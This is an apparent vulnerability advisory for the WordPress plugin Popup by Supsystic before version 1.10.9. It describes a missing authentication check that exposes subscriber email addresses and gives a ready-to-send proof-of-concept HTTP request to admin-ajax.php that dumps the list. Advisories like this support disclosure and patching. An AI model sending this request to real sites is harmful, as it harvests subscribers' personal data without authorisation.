WordPress Plugin Vulnerabilities
Popup by Supsystic < 1.10.9 - Unauthenticated Subscriber Email Addresses Disclosure
Description
The plugin does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Length: 104 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close page=subscribe&action=getListForTbl&reqType=ajax&search[text_like]=&_search=false&pl=pps&sidx=id&rows=10
Affects Plugins
References
CVE
Classification
Type
SENSITIVE DATA DISCLOSURE
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Felipe de Avila
Submitter
Felipe de Avila
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-04-18 (about 2 years ago)
Added
2022-04-18 (about 2 years ago)
Last Updated
2022-04-19 (about 2 years ago)